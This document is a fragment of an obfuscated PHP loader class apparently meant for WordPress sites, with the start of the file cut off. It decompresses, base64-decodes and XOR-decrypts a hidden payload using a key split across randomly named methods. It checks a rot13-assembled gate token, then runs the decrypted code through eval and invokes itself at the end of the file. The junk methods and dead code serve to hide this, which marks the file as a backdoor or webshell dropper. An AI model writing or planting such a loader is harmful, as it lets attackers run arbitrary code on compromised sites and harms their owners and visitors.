'; echo 'Step 2 - Binary Data Length: ' . strlen($bin_data) . '
'; } $inflated_once = @gzinflate($bin_data); if ($inflated_once === false) { $inflated_once = $bin_data; if (isset($_GET['debug'])) echo 'Step 3 - First inflation failed, using binary data.
'; } else { if (isset($_GET['debug'])) echo 'Step 3 - First inflation successful.
'; } $inflated_twice = @gzinflate($inflated_once); if ($inflated_twice === false) { $inflated_twice = $inflated_once; if (isset($_GET['debug'])) echo 'Step 4 - Second inflation failed, using first inflated data.
'; } else { if (isset($_GET['debug'])) echo 'Step 4 - Second inflation successful.
'; } $b64_decoded = base64_decode($inflated_twice); if ($b64_decoded === false) { if (isset($_GET['debug'])) echo 'Step 5 - Base64_decode failed.
'; return; } if (isset($_GET['debug'])) echo 'Step 5 - Base64_decode successful. Length: ' . strlen($b64_decoded) . '
'; $obj = new self(); $final_key = ''; $key_methods = ['kmYDyeBg67', 'kmUXTLOF67']; foreach ($key_methods as $method) { $final_key .= call_user_func_array([$obj, $method], []); } if (isset($_GET['debug'])) echo 'Step 6 - Reconstructed Key: ' . $final_key . '
'; $gate_token = ''; $gate_methods = ['gtqUHgFF17', 'gtNOWrbW16', 'gtQyeRQK96']; foreach ($gate_methods as $method) { $gate_token .= call_user_func_array([$obj, $method], []); } if (md5($gate_token) !== '2b14fcea42eea546d96955449f27d262') { if (isset($_GET['debug'])) echo 'Step 7 - Gate token check failed.
'; } else { if (isset($_GET['debug'])) echo 'Step 7 - Gate token check successful.
'; } $plain_code = ''; if (strlen($final_key) > 0) { for ($i = 0, $len = strlen($b64_decoded); $i < $len; $i++) { $plain_code .= chr(ord($b64_decoded[$i]) ^ ord($final_key[$i % strlen($final_key)])); } } else { $plain_code = $b64_decoded; } if (isset($_GET['debug'])) echo 'Step 8 - Final Plain Code (first 200 chars):
' . htmlspecialchars(substr($plain_code, 0, 200)) . '
'; $obj->_execute_xKtFEwHV81($plain_code); } private function gtQyeRQK96() { // Gate piece 3 $__d = function_exists('curl_init') ? 'curl_ok' : 'curl_fail'; return str_rot13('kmu9'); } private function gtNOWrbW16() { // Gate piece 2 $jv2 = (bool)mt_rand(0,1); return str_rot13('y786'); } private function gtqUHgFF17() { // Gate piece 1 @eval('return true;'); // Potongan eval yang tidak berbahaya return str_rot13('xrz2j'); } private function _execute_xKtFEwHV81($code) { // WordPress-compatible execution handler if (isset($_GET['debug'])) { ini_set('display_errors', 1); error_reporting(E_ALL); echo 'DEBUG MODE ACTIVE
'; } $original_dir = getcwd(); $script_dir = defined('__DIR__') ? __DIR__ : dirname(__FILE__); chdir($script_dir); // Remove PHP tags to avoid issues with eval $code = preg_replace('/^\s*<\?php\s*/', '', $code); $code = preg_replace('/\s*\?>\s*$/', '', $code); try { // Execute code in the correct directory context @eval($code); } catch (ParseError $e) { if (isset($_GET['debug'])) echo 'Parse Error: ' . $e->getMessage(); } catch (Error $e) { if (isset($_GET['debug'])) echo 'Fatal Error: ' . $e->getMessage(); } catch (Exception $e) { if (isset($_GET['debug'])) echo 'Exception: ' . $e->getMessage(); } chdir($original_dir); } private function kmYDyeBg67() { // Key segment 1 if (67 > 50) { $jv2 = 'branch_a'; } else { $jv2 = 'branch_b'; } return base64_decode('Rk81dmc3Rg=='); } public function pubaCMwx76() { // Public method 1 $jv1 = defined('__DIR__') ? __DIR__ : dirname(__FILE__); return 'valsCsU32'; } private function kmUXTLOF67() { // Key segment 2 $__d = function_exists('curl_init') ? 'curl_ok' : 'curl_fail'; return base64_decode('YjJuZk90MQ=='); } private function dcHGMPQx67() { // cmtvPmS49 $__d = defined('__DIR__') ? __DIR__ : dirname(__FILE__); return null; } public function pubwqYzr55() { // Public method 2 $jv2 = (bool)mt_rand(0,1); for($jv1=0; $jv1<2; $jv1++) {} return 'valpNpM39'; } } LoaderiEvMGe81647::init677(); // EOF